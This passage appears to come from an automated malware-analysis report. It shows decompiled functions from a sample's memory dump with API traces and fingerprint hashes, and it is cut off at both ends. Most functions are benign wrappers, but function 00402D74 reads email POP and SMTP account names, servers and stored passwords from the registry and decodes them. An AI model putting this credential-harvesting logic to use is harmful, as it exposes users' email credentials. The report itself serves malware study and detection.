                                                                                                                                                                  0x0040bb29
                                                                                                                                                                  0x0040bb30
                                                                                                                                                                  0x0040bb35
                                                                                                                                                                  0x0040bb3f
                                                                                                                                                                  0x0040bb56
                                                                                                                                                                  0x0040bb41
                                                                                                                                                                  0x0040bb41
                                                                                                                                                                  0x0040bb45
                                                                                                                                                                  0x0040bb52
                                                                                                                                                                  0x0040bb47
                                                                                                                                                                  0x0040bb4d
                                                                                                                                                                  0x0040bb4d
                                                                                                                                                                  0x0040bb45
                                                                                                                                                                  0x0040bb6b
                                                                                                                                                                  0x0040bb78
                                                                                                                                                                  0x0040bb81
                                                                                                                                                                  0x0040bb82
                                                                                                                                                                  0x0040bb88
                                                                                                                                                                  0x0040bb8c
                                                                                                                                                                  0x0040bb8c

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00401E4A: memset.MSVCRT ref: 00401E6C
                                                                                                                                                                    • Part of subcall function 00401E4A: strlen.MSVCRT ref: 00401E85
                                                                                                                                                                    • Part of subcall function 00401E4A: strlen.MSVCRT ref: 00401E93
                                                                                                                                                                    • Part of subcall function 00401E4A: strlen.MSVCRT ref: 00401ED9
                                                                                                                                                                    • Part of subcall function 00401E4A: strlen.MSVCRT ref: 00401EE7
                                                                                                                                                                  • _stricmp.MSVCRT(/stext,0041344F,?,00000000,00000000,?,?,?,0040BCA6), ref: 0040BB0B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: strlen$_stricmpmemset
                                                                                                                                                                  • String ID: /stext
                                                                                                                                                                  • API String ID: 3575250601-3817206916
                                                                                                                                                                  • Opcode ID: ef7f166fbeea55439cfe23be9aafe6a7a28943b2fccc9fc2cab937996929cfca
                                                                                                                                                                  • Instruction ID: f8692cde8425b7317fc14f1eb66aa5838d4e8645dd66f9f31b24f8adae3a6e9d
                                                                                                                                                                  • Opcode Fuzzy Hash: ef7f166fbeea55439cfe23be9aafe6a7a28943b2fccc9fc2cab937996929cfca
                                                                                                                                                                  • Instruction Fuzzy Hash: 20213E707141119FC368AF29C8D1A66B3A8FB04318B15827FE41AA7692C779EC518BCD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040625C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040625C() {
				struct tagLOGFONTA _v64;
				struct HFONT__* _t6;

				E0040619B( &_v64, "Arial", 0xe, 0);
				_t6 = CreateFontIndirectA( &_v64); // executed
				return _t6;
			}





                                                                                                                                                                  0x0040626e
                                                                                                                                                                  0x0040627a
                                                                                                                                                                  0x00406281

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040619B: memset.MSVCRT ref: 004061A5
                                                                                                                                                                    • Part of subcall function 0040619B: strcpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,00406273,Arial,0000000E,00000000), ref: 004061E5
                                                                                                                                                                  • CreateFontIndirectA.GDI32(?), ref: 0040627A
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateFontIndirectmemsetstrcpy
                                                                                                                                                                  • String ID: Arial
                                                                                                                                                                  • API String ID: 3275230829-493054409
                                                                                                                                                                  • Opcode ID: 4817efd26ad33d4b637fc7e29178505d6c073bef41158034ee275bb9fa043b80
                                                                                                                                                                  • Instruction ID: 6f23277ce9f10cc220d5cb12b38cfb89722835dabc034d80cc056b5664af2580
                                                                                                                                                                  • Opcode Fuzzy Hash: 4817efd26ad33d4b637fc7e29178505d6c073bef41158034ee275bb9fa043b80
                                                                                                                                                                  • Instruction Fuzzy Hash: 8FD01270D4020D77E610FBA0FC07FC97BAC5B00B05F504431B901F50E6FAE8E2598699
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004047AA, Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E004047AA(CHAR* __esi, void* __eflags) {
				struct HINSTANCE__* _t8;
				char _t12;
				char* _t15;
				CHAR* _t17;

				_t17 = __esi;
				E004047FB(__esi);
				_t8 = LoadLibraryA(__esi); // executed
				__esi[0x200] = _t8;
				if(_t8 != 0) {
					_t12 = GetProcAddress(_t8,  &(__esi[0xff]));
					__esi[0x208] = _t12;
					if(_t12 != 0) {
						__esi[0x204] = 1;
					}
				}
				_t15 =  &(_t17[0x204]);
				if( *_t15 == 0) {
					E004047FB(_t17);
				}
				return  *_t15;
			}







                                                                                                                                                                  0x004047aa
                                                                                                                                                                  0x004047ac
                                                                                                                                                                  0x004047b2
                                                                                                                                                                  0x004047ba
                                                                                                                                                                  0x004047c0
                                                                                                                                                                  0x004047ca
                                                                                                                                                                  0x004047d2
                                                                                                                                                                  0x004047d8
                                                                                                                                                                  0x004047da
                                                                                                                                                                  0x004047da
                                                                                                                                                                  0x004047d8
                                                                                                                                                                  0x004047e5
                                                                                                                                                                  0x004047ee
                                                                                                                                                                  0x004047f2
                                                                                                                                                                  0x004047f2
                                                                                                                                                                  0x004047fa

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004047FB: FreeLibrary.KERNELBASE(?,?), ref: 00404810
                                                                                                                                                                  • LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,7479F420), ref: 004047B2
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 145871493-0
                                                                                                                                                                  • Opcode ID: 79a2d912799eded2ecd004947e833272afd2c53e23871a46eb3e118a9608fd27
                                                                                                                                                                  • Instruction ID: a05247dfa83e1e5897bdf1ebfda0bf15c3173a66790072ff667e3a7d903ceddc
                                                                                                                                                                  • Opcode Fuzzy Hash: 79a2d912799eded2ecd004947e833272afd2c53e23871a46eb3e118a9608fd27
                                                                                                                                                                  • Instruction Fuzzy Hash: C6F0E5B46007038BD720DF39D849797B7E8AF45701F00853EF166E3185E778A641C758
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040F17F, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetPrivateProfileIntA.KERNEL32 ref: 0040F1A6
                                                                                                                                                                    • Part of subcall function 0040F097: memset.MSVCRT ref: 0040F0B5
                                                                                                                                                                    • Part of subcall function 0040F097: _itoa.MSVCRT ref: 0040F0CC
                                                                                                                                                                    • Part of subcall function 0040F097: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0040F0DB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4165544737-0
                                                                                                                                                                  • Opcode ID: 60443182dfafd2705f0bd8163bf991a75ed65358abc62ac36d7f3c586c4344a1
                                                                                                                                                                  • Instruction ID: ef80bc42b69c7626de0f5e8b39bb4bd6d74a87ec05759e80c101291bc1ad5009
                                                                                                                                                                  • Opcode Fuzzy Hash: 60443182dfafd2705f0bd8163bf991a75ed65358abc62ac36d7f3c586c4344a1
                                                                                                                                                                  • Instruction Fuzzy Hash: 22E0B632004209FBCF125F90EC01AA93FA6FF04315F148479F95C14961E33295B4AB84
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004047FB, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E004047FB(void* __eax) {
				struct HINSTANCE__* _t5;
				signed int* _t7;

				 *(__eax + 0x204) =  *(__eax + 0x204) & 0x00000000;
				_t7 = __eax + 0x200;
				_t5 =  *_t7;
				if(_t5 != 0) {
					_t5 = FreeLibrary(_t5); // executed
					 *_t7 =  *_t7 & 0x00000000;
				}
				return _t5;
			}





                                                                                                                                                                  0x004047fb
                                                                                                                                                                  0x00404803
                                                                                                                                                                  0x00404809
                                                                                                                                                                  0x0040480d
                                                                                                                                                                  0x00404810
                                                                                                                                                                  0x00404816
                                                                                                                                                                  0x00404816
                                                                                                                                                                  0x0040481a

                                                                                                                                                                  APIs
                                                                                                                                                                  • FreeLibrary.KERNELBASE(?,?), ref: 00404810
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                  • Opcode ID: 9daaca44af3c137c04138a24eb8ff8cf64b72ee1785e34895ec44d417b16343b
                                                                                                                                                                  • Instruction ID: a9857fde68bfdf8991c7705c8330266d98638ef7b5ff2aef664b3e01c595234a
                                                                                                                                                                  • Opcode Fuzzy Hash: 9daaca44af3c137c04138a24eb8ff8cf64b72ee1785e34895ec44d417b16343b
                                                                                                                                                                  • Instruction Fuzzy Hash: 54D012B61003118FDB209F14EC0CBE133ECAF40312F15C4B9E951A7156C3349540CA58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00405EEE, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00405EEE(CHAR* _a4) {
				void* _t3;

				_t3 = CreateFileA(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
				return _t3;
			}




                                                                                                                                                                  0x00405f00
                                                                                                                                                                  0x00405f06

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,00409CBE,00000000,00000000,00000000,0041344F,0041344F,?,0040BB7D,0041344F), ref: 00405F00
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                  • Opcode ID: 9dd7920263122c6c5394d1aa857aadcc673b4f54c51fbdd86ca26a9f0088c7b1
                                                                                                                                                                  • Instruction ID: bc29cfa666e89d0cfbdb77cae37961506820f0e8ddae25b665a114bfacacae09
                                                                                                                                                                  • Opcode Fuzzy Hash: 9dd7920263122c6c5394d1aa857aadcc673b4f54c51fbdd86ca26a9f0088c7b1
                                                                                                                                                                  • Instruction Fuzzy Hash: 1BC092B0660200BEFE208A20AC0AF77299DD780705F1084207A04E40E0C2A18C008624
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040F402, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040F402(struct HINSTANCE__* _a4, CHAR* _a8) {

				EnumResourceNamesA(_a4, _a8, E0040F37C, 0); // executed
				return 1;
			}



                                                                                                                                                                  0x0040f411
                                                                                                                                                                  0x0040f41a

                                                                                                                                                                  APIs
                                                                                                                                                                  • EnumResourceNamesA.KERNEL32 ref: 0040F411
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumNamesResource
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3334572018-0
                                                                                                                                                                  • Opcode ID: 37d1da76d95b5e126e15f716cf118d031e4b8f34fe6c8a3d6132a8d2fb8fd21e
                                                                                                                                                                  • Instruction ID: fad5876d7f8aa1560905c766ba53a11d3010bfcf0403834e812c2ac38a9eeaed
                                                                                                                                                                  • Opcode Fuzzy Hash: 37d1da76d95b5e126e15f716cf118d031e4b8f34fe6c8a3d6132a8d2fb8fd21e
                                                                                                                                                                  • Instruction Fuzzy Hash: 88C09B31594341D7C711DF208C05F1BFEE5BB5C702F108C3D7151D40E4C77180189615
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004070C5, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E004070C5(signed int* __esi) {
				int _t2;
				void* _t3;

				_t3 =  *__esi;
				if(_t3 != 0xffffffff) {
					_t2 = FindClose(_t3); // executed
					 *__esi =  *__esi | 0xffffffff;
					return _t2;
				}
				return 0;
			}





                                                                                                                                                                  0x004070c5
                                                                                                                                                                  0x004070cc
                                                                                                                                                                  0x004070cf
                                                                                                                                                                  0x004070d5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004070d5
                                                                                                                                                                  0x004070d8

                                                                                                                                                                  APIs
                                                                                                                                                                  • FindClose.KERNELBASE(?,00406FDF,?,?,00000000,?,00411327,*.oeaccount,0041141B,?,00000104), ref: 004070CF
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseFind
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1863332320-0
                                                                                                                                                                  • Opcode ID: 1626034a8a252c87a5f1d6eb16cf0afdbdd25481107d0dfa13c5d9d9acae7190
                                                                                                                                                                  • Instruction ID: fb6f9d5761a39194e530e87d941626cbb459cc8d01e30c2ad93bf7984ca40ca8
                                                                                                                                                                  • Opcode Fuzzy Hash: 1626034a8a252c87a5f1d6eb16cf0afdbdd25481107d0dfa13c5d9d9acae7190
                                                                                                                                                                  • Instruction Fuzzy Hash: 77C09230510A01ABD23C5F389C5A46A7BA0AF593323B48F6CE0F3D24F0E73899868A04
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040EF05, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040EF05(void* __esi) {
				struct HINSTANCE__* _t6;
				int _t7;

				_t6 =  *(__esi + 8);
				 *(__esi + 0xc) =  *(__esi + 0xc) & 0x00000000;
				if(_t6 != 0) {
					_t7 = FreeLibrary(_t6); // executed
					 *(__esi + 8) =  *(__esi + 8) & 0x00000000;
					return _t7;
				}
				return _t6;
			}





                                                                                                                                                                  0x0040ef05
                                                                                                                                                                  0x0040ef08
                                                                                                                                                                  0x0040ef0e
                                                                                                                                                                  0x0040ef11
                                                                                                                                                                  0x0040ef17
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ef17
                                                                                                                                                                  0x0040ef1b

                                                                                                                                                                  APIs
                                                                                                                                                                  • FreeLibrary.KERNELBASE(?,0040EF39,?,?,?,?,?,?,00404221), ref: 0040EF11
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeLibrary
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3664257935-0
                                                                                                                                                                  • Opcode ID: 2e074f5d4832a7d58a2bd7b26742b92faf01e6cbf369b165caea939fd76fa933
                                                                                                                                                                  • Instruction ID: 3414d520a0ca87f174e03c7aae78275fe345844bef97b548c291c08909f1245b
                                                                                                                                                                  • Opcode Fuzzy Hash: 2e074f5d4832a7d58a2bd7b26742b92faf01e6cbf369b165caea939fd76fa933
                                                                                                                                                                  • Instruction Fuzzy Hash: 62C04C31210702DBEB218B12C849753B7E8AB40317F40CC68945695494D77DE454CE18
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00406155, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00406155(CHAR* _a4) {
				long _t4;

				_t4 = GetFileAttributesA(_a4); // executed
				return 0 | _t4 != 0xffffffff;
			}




                                                                                                                                                                  0x00406159
                                                                                                                                                                  0x00406169

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileAttributesA.KERNELBASE(?,00408328,?,004083DE,00000000,?,00000000,00000104,?), ref: 00406159
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AttributesFile
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3188754299-0
                                                                                                                                                                  • Opcode ID: 926f1fff4bfe7087d2453ca09093eb98846d62159ddff5e69568d7a31b1a8361
                                                                                                                                                                  • Instruction ID: f305466360af1034a225c08a34d2ddc6697937c487c9f6746c0aa1a011dcbbf5
                                                                                                                                                                  • Opcode Fuzzy Hash: 926f1fff4bfe7087d2453ca09093eb98846d62159ddff5e69568d7a31b1a8361
                                                                                                                                                                  • Instruction Fuzzy Hash: CCB012753100005BCB080B349C4A0CD35506F446327204B3CB033C00F0D720CE60BA00
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040F1B0, Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040F1B0(void* _a4, char* _a8, void** _a12) {
				long _t4;

				_t4 = RegOpenKeyExA(_a4, _a8, 0, 0x20019, _a12); // executed
				return _t4;
			}




                                                                                                                                                                  0x0040f1c3
                                                                                                                                                                  0x0040f1c9

                                                                                                                                                                  APIs
                                                                                                                                                                  • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Open
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 71445658-0
                                                                                                                                                                  • Opcode ID: 0defe296c07798555785544969a09239eaeede922113c6288443005d002a046f
                                                                                                                                                                  • Instruction ID: 6c28280414aaf847a098fae787e0885161fd0282473b9be1e1f1fd42ed515737
                                                                                                                                                                  • Opcode Fuzzy Hash: 0defe296c07798555785544969a09239eaeede922113c6288443005d002a046f
                                                                                                                                                                  • Instruction Fuzzy Hash: 41C09B35544301FFDE118F40ED05F09BFA1AB88B05F008414B244240B1C2718414EB17
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  Function 00402D74, Relevance: 29.9, APIs: 5, Strings: 12, Instructions: 153stringregistryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                  			E00402D74(void* __ecx, void* __edi, void* __esi, void* __fp0, signed int _a4, void* _a8) {
				signed int _v8;
				char _v20;
				char _v24;
				char _v152;
				char _v280;
				char _v408;
				intOrPtr _v412;
				char _v668;
				char _v796;
				intOrPtr _v800;
				char _v928;
				char _v940;
				char _v952;
				char _v956;
				char _v1084;
				char _v1212;
				char _v1340;
				intOrPtr _v1344;
				char _v1600;
				char _v1728;
				intOrPtr _v1732;
				char _v1860;
				char _v1872;
				void* _t59;
				signed int _t60;
				intOrPtr _t63;
				void* _t113;
				void* _t118;
				void* _t122;
				char* _t123;
				void* _t141;

				_t141 = __fp0;
				_t118 = __edi;
				_t113 = __ecx;
				_t59 = E0040F1B0(_a4, _a8,  &_a8);
				if(_t59 == 0) {
					_t60 = 0x7d;
					_a4 = _t60;
					_v8 = _t60;
					E00402197( &_v1872);
					E00402197( &_v940);
					_t63 = 2;
					_v1732 = _t63;
					_v800 = _t63;
					_push( &_v928);
					_push("DisplayName");
					_push(_a8);
					_v1344 = 4;
					_t122 = 0x7f;
					_v412 = 1;
					E0040F1F1(_t122, _t113);
					E0040F1F1(_t122, _t113, _a8, "EmailAddress",  &_v796);
					E0040F1F1(_t122, _t113, _a8, "PopAccount",  &_v408);
					E0040F1F1(_t122, _t113, _a8, "PopServer",  &_v668);
					E0040F1CA(_t113, _a8, "PopPort",  &_v24);
					E0040F1CA(_t113, _a8, "PopLogSecure",  &_v20);
					if(E0040F214(_t113, _a8, "PopPassword",  &_v280,  &_a4) != 0) {
						_a4 = _a4 & 0x00000000;
					}
					strcpy( &_v1860,  &_v928);
					strcpy( &_v1728,  &_v796);
					E0040F1F1(_t122, _t113, _a8, "SMTPAccount",  &_v1340);
					E0040F1F1(_t122, _t113, _a8, "SMTPServer",  &_v1600);
					E0040F1CA(_t113, _a8, "SMTPPort",  &_v956);
					E0040F1CA(_t113, _a8, "SMTPLogSecure",  &_v952);
					if(E0040F214(_t113, _a8, "SMTPPassword",  &_v1212,  &_v8) != 0) {
						_v8 = _v8 & 0x00000000;
					}
					_t123 = _t118 + 0xa9c;
					strcpy( &_v152, _t123);
					strcpy( &_v1084, _t123);
					_t116 = _a4;
					if(_a4 > 0) {
						E00401CD7( &_v280, _t116);
					}
					if(_v408 != 0) {
						E004023C6( &_v940, _t141, _t118);
					}
					_t117 = _v8;
					if(_v8 > 0) {
						E00401CD7( &_v1212, _t117);
					}
					if(_v1340 != 0) {
						E004023C6( &_v1872, _t141, _t118);
					}
					return RegCloseKey(_a8);
				}
				return _t59;
			}


































                                                                                                                                                                  0x00402d74
                                                                                                                                                                  0x00402d74
                                                                                                                                                                  0x00402d74
                                                                                                                                                                  0x00402d87
                                                                                                                                                                  0x00402d91
                                                                                                                                                                  0x00402d9a
                                                                                                                                                                  0x00402da1
                                                                                                                                                                  0x00402da4
                                                                                                                                                                  0x00402da7
                                                                                                                                                                  0x00402db2
                                                                                                                                                                  0x00402db9
                                                                                                                                                                  0x00402dba
                                                                                                                                                                  0x00402dc0
                                                                                                                                                                  0x00402dcc
                                                                                                                                                                  0x00402dcd
                                                                                                                                                                  0x00402dd2
                                                                                                                                                                  0x00402dd5
                                                                                                                                                                  0x00402de1
                                                                                                                                                                  0x00402de4
                                                                                                                                                                  0x00402dee
                                                                                                                                                                  0x00402e04
                                                                                                                                                                  0x00402e1a
                                                                                                                                                                  0x00402e30
                                                                                                                                                                  0x00402e41
                                                                                                                                                                  0x00402e52
                                                                                                                                                                  0x00402e77
                                                                                                                                                                  0x00402e79
                                                                                                                                                                  0x00402e79
                                                                                                                                                                  0x00402e8b
                                                                                                                                                                  0x00402e9e
                                                                                                                                                                  0x00402eb4
                                                                                                                                                                  0x00402eca
                                                                                                                                                                  0x00402ede
                                                                                                                                                                  0x00402ef2
                                                                                                                                                                  0x00402f17
                                                                                                                                                                  0x00402f19
                                                                                                                                                                  0x00402f19
                                                                                                                                                                  0x00402f1d
                                                                                                                                                                  0x00402f2b
                                                                                                                                                                  0x00402f38
                                                                                                                                                                  0x00402f3d
                                                                                                                                                                  0x00402f46
                                                                                                                                                                  0x00402f4e
                                                                                                                                                                  0x00402f4e
                                                                                                                                                                  0x00402f5a
                                                                                                                                                                  0x00402f63
                                                                                                                                                                  0x00402f63
                                                                                                                                                                  0x00402f68
                                                                                                                                                                  0x00402f6d
                                                                                                                                                                  0x00402f75
                                                                                                                                                                  0x00402f75
                                                                                                                                                                  0x00402f81
                                                                                                                                                                  0x00402f8a
                                                                                                                                                                  0x00402f8a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00402f92
                                                                                                                                                                  0x00402f99

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                                                                                                                                                                    • Part of subcall function 0040F1F1: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040F582,?,?,?,?,0040F582,00000000,?,?), ref: 0040F20C
                                                                                                                                                                    • Part of subcall function 0040F1CA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402904,?,?,?,?,00402904,?,?), ref: 0040F1E9
                                                                                                                                                                    • Part of subcall function 0040F214: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,0040245F,?), ref: 0040F22A
                                                                                                                                                                  • strcpy.MSVCRT(?,?), ref: 00402E8B
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?), ref: 00402E9E
                                                                                                                                                                  • strcpy.MSVCRT(?,?), ref: 00402F2B
                                                                                                                                                                  • strcpy.MSVCRT(?,?,?,?), ref: 00402F38
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402F92
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: strcpy$QueryValue$CloseOpen
                                                                                                                                                                  • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                                                                                                  • API String ID: 4127491968-1534328989
                                                                                                                                                                  • Opcode ID: 4a263c393ebea8c7b3aa3f5485092cacd202bcda1693c223d9a8b8372ccc35ea
                                                                                                                                                                  • Instruction ID: 3eb728c69d877055b887914c3e29035f7ad0c3b4bfdbdde50966da93315596c3
                                                                                                                                                                  • Opcode Fuzzy Hash: 4a263c393ebea8c7b3aa3f5485092cacd202bcda1693c223d9a8b8372ccc35ea
                                                                                                                                                                  • Instruction Fuzzy Hash: 315139B1910218BEDB21EF51CD06BDE777CAF04304F1081B7BA08B6191E7789B989F58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004033B1, Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E004033B1(void* __edi, void* __fp0, intOrPtr _a4) {
				char _v276;
				char _v404;
				intOrPtr _v408;
				char _v664;
				intOrPtr _v796;
				char _v936;
				char _v1208;
				char _v1336;
				intOrPtr _v1340;
				char _v1596;
				intOrPtr _v1728;
				char _v1868;
